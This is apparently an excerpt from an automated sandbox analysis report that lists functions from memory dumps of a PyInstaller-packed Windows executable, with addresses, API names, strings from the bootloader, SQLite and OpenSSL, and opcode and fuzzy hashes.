                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                              • String ID: pkey_poly1305_init$wB5
                                                              • API String ID: 3300690313-1105255960
                                                              • Opcode ID: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
                                                              • Instruction ID: f5a699eafda9f3c7d1612624a582861cbc3565fe622c48b0665439542cf5734e
                                                              • Opcode Fuzzy Hash: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
                                                              • Instruction Fuzzy Hash: 626237267291D3C6E7158E38D5106BD7BA0F748785F045532EAAEC37E8EA7CEA45CB00
                                                              Function 00007FFE0130EB60 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 511fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133319$CreateFile
                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                              • API String ID: 2359287044-3829269058
                                                              • Opcode ID: 02fe53ef66c887b033a51c45fdd9431cb64e4c276c082006cc8d896bd139607b
                                                              • Instruction ID: d0b695e359426d216e9cdbe01500d2691da65d0ff15253b9627edb6bda54083f
                                                              • Opcode Fuzzy Hash: 02fe53ef66c887b033a51c45fdd9431cb64e4c276c082006cc8d896bd139607b
                                                              • Instruction Fuzzy Hash: 7932F321E0DB4286FB668BA4A46477973E4FF44BA4F054A39DA5E0A6F5DF3CE485C300
                                                              Function 00007FFE01381F40 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133319
                                                              • String ID: database schema is locked: %s$out of memory$statement too long
                                                              • API String ID: 3961744453-1046679716
                                                              • Opcode ID: cee6958ed2d341b78b1a96b9300467cf5085ba834bfbaaeef5a04b714906b51f
                                                              • Instruction ID: 1298fe1e42510024bca23062ffb0490930922582a2ee111bb77d58487a1c3a30
                                                              • Opcode Fuzzy Hash: cee6958ed2d341b78b1a96b9300467cf5085ba834bfbaaeef5a04b714906b51f
                                                              • Instruction Fuzzy Hash: 10028932A0878286EB69CF2595543BE67A1FB45B88F0A4135DE4E0F7A6CF7CE491C710
                                                              Function 00007FFE01320090 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 583COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: :memory:
                                                              • API String ID: 2248877218-2920599690
                                                              • Opcode ID: f8b812a7b1f5107f2ac20128d0d1a1db88b711974eb086f1ba1b0e6601ab192c
                                                              • Instruction ID: a929ff2efa7a4232d7be72d61fcf9e5d73086a70451afe246c791988daf1f566
                                                              • Opcode Fuzzy Hash: f8b812a7b1f5107f2ac20128d0d1a1db88b711974eb086f1ba1b0e6601ab192c
                                                              • Instruction Fuzzy Hash: 3342BE32A0D78286FB689B25945437977A0FFA5B84F164135EA4E0B7B5DF3CE498C302
                                                              Function 00007FF623F79280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                              • Instruction ID: a5cc9f9caf7229d9bfa772b03514d7b885c6cdd0412d44df934a638a44587731
                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                              • Instruction Fuzzy Hash: 8FF0C822A1874186FBA08F60B89A7667360AB84764F044379D96E576D4DF3CD148CB01
                                                              Function 00007FFE0130FEB0 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemInfo.KERNEL32(?,?,?,?,00007FFE013BE1FC,?,?,?,?,00007FFE01308ABD,?,?,?,?,00007FFE01335AA7), ref: 00007FFE0130FED8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: 2ee4342b15a73cf515a198ee26b50fac196a910b5e623ee29fdfc80da0576b31
                                                              • Instruction ID: 8e3fc2deb35cbfc555fed5bd5d6504ba38041143611464c0922addcd3e85c8ab
                                                              • Opcode Fuzzy Hash: 2ee4342b15a73cf515a198ee26b50fac196a910b5e623ee29fdfc80da0576b31
                                                              • Instruction Fuzzy Hash: 96A13564E0EB0786FF698B55A82067823E4BF45BC8F050939E95E0F7B1EF6CE5948241
                                                              Function 00007FF623F71950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF623F77F90: _fread_nolock.LIBCMT ref: 00007FF623F7803A
                                                              • _fread_nolock.LIBCMT ref: 00007FF623F71A1B
                                                                • Part of subcall function 00007FF623F72910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF623F71B6A), ref: 00007FF623F7295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _fread_nolock$CurrentProcess
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 2397952137-3497178890
                                                              • Opcode ID: da661dafef7a958cffc458f9031f094bed4044546fae98e38e9c6353f513da79
                                                              • Instruction ID: ddfed926d79b539a095e24ee899c3fd563e6e6b1f54bb10d65a3fae352ffc253
                                                              • Opcode Fuzzy Hash: da661dafef7a958cffc458f9031f094bed4044546fae98e38e9c6353f513da79
                                                              • Instruction Fuzzy Hash: 8B818071A0868285EF609F14F8466F923A0EF48784F4485B5D98DEB789DF3CE74A8742
                                                              Function 00007FF623F71470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: 96ab636e07cd70b109720d197671e9f7c97d66c172cb09efb4673ae76c18ac26
                                                              • Instruction ID: 79c5551ca90c4f942667e1560eb04dd0b37b32a32949bfc6bbed712a34e9c202
                                                              • Opcode Fuzzy Hash: 96ab636e07cd70b109720d197671e9f7c97d66c172cb09efb4673ae76c18ac26
                                                              • Instruction Fuzzy Hash: D6416E22B1864296EF14DF22BC425B96390EF447D4F4445B2ED4DABB99DF3CEA06C702
                                                              Function 00007FF623F71210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2050909247-2813020118
                                                              • Opcode ID: 567d2b2a7f0e97ab327bb9737c7fda7300a3cf2f0aede88f43ca3804e35b56c4
                                                              • Instruction ID: 5b774e1941a2f323e2dbd92c08cff17772c76c3ce4ad0db418442a615fd62f36
                                                              • Opcode Fuzzy Hash: 567d2b2a7f0e97ab327bb9737c7fda7300a3cf2f0aede88f43ca3804e35b56c4
                                                              • Instruction Fuzzy Hash: E051E922A0864245EE649F12FC423BA6291FF85B94F444175ED4DEB7D9EF3CE60AC702
                                                              Function 00007FF623F736B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF623F73804), ref: 00007FF623F736E1
                                                              • GetLastError.KERNEL32(?,00007FF623F73804), ref: 00007FF623F736EB
                                                                • Part of subcall function 00007FF623F72C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72C9E
                                                                • Part of subcall function 00007FF623F72C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72D63
                                                                • Part of subcall function 00007FF623F72C50: MessageBoxW.USER32 ref: 00007FF623F72D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 3187769757-2863816727
                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                              • Instruction ID: 7785ab69f8acfd8061b58c875a41ae4f4a4e896ae795533db508863402dbc0bf
                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                              • Instruction Fuzzy Hash: FC219161B1C64291FE209B24FC527F62260BF88394F804176D95DEB5E5EF2CE705C742
                                                              Function 00007FF623F8BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                              • Instruction ID: d7c8534323d39f3c039a652470f4d0aff8da1c38563d477d92b3bf82e2e898ce
                                                              • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                              • Instruction Fuzzy Hash: 2FC1E522A0C78691EF689B16B8422BD7B90FF81BC0F554171EA4DA7391CF7CEE458702
                                                              Function 00007FF623F76360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                              • API String ID: 2050909247-2434346643
                                                              • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                              • Instruction ID: 49bf678f85540dd60466c0782136129d3a5e9790cd91f341a3ed590aece44865
                                                              • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                              • Instruction Fuzzy Hash: BE418121A18686D1EE25DF20FC161E96361FF84384F904172DA5CAB695EF3CE719C342
                                                              Function 00007FFE01317AA0 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 618COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007$B5630E133319
                                                              • String ID: -journal$immutable$nolock
                                                              • API String ID: 3186227039-4201244970
                                                              • Opcode ID: 56f8b545fd850ec2fba759bda1cede5f4a56be7dd073fe73f8ade34120e359aa
                                                              • Instruction ID: 35b36b1d6f5342be48c3bf391d6d1a8071571f0dfca2d8d793092a49636f0459
                                                              • Opcode Fuzzy Hash: 56f8b545fd850ec2fba759bda1cede5f4a56be7dd073fe73f8ade34120e359aa
                                                              • Instruction Fuzzy Hash: 6C52BD62A09786DAEB698B2598403B977A0FF05BA4F094734DA6E0B7F1DF3CE455C304
                                                              Function 00007FFE01318A40 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s at line %d of [%.10s]$database corruption$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24
                                                              • API String ID: 0-2551159147
                                                              • Opcode ID: ba738d91b7b18cfe5946a2c4883e3a5e109154c5a3efbfe4252b9f65d12e370e
                                                              • Instruction ID: 197e9f977fc1baa1a93d2e116b7d3fea6c4c91a0e683a16930d9d2e2af5fb31d
                                                              • Opcode Fuzzy Hash: ba738d91b7b18cfe5946a2c4883e3a5e109154c5a3efbfe4252b9f65d12e370e
                                                              • Instruction Fuzzy Hash: A8715E62A09A42C2FF659B15E45037AB7A2FB84B84F168075DE4E4F6B5EF7CE4428304
                                                              Function 00007FFE0130C410 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                              • Associated: 00000001.00000002.1989280421.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE0145E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989334674.00007FFE01473000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989793982.00007FFE01475000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133319FileRead
                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                              • API String ID: 3796675634-1843600136
                                                              • Opcode ID: 5795c4c460f43af0e08c20558cf91eca1fca338dd519bb9f69572c6e71e13f00
                                                              • Instruction ID: 7cba1b0e45d8ebf35f4d2569dd07c3f7f53f0784d4be73524738c59a51c7dc73
                                                              • Opcode Fuzzy Hash: 5795c4c460f43af0e08c20558cf91eca1fca338dd519bb9f69572c6e71e13f00
                                                              • Instruction Fuzzy Hash: 1B414832A08A4286E311DF55E4505B9B7E5FF84B80F56123AEA4D9BAB2CF3DE446C740
                                                              Function 00007FF623F85628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0
                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                              • Instruction ID: ad901913d66f207543b61d91d93c870ef32fb8529524f6c9749fc9b6f04c8aed
                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                              • Instruction Fuzzy Hash: 18419422E1878183EB588F22A9113797261FB947E4F109375EA5C53AD1DF7CA6E48701
                                                              Function 00007FF623F7CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                              • Instruction ID: 9c21fc3b7fd5476a8edd4a8fa1ea808824f1fafe24cb91e42e886073ce0602e3
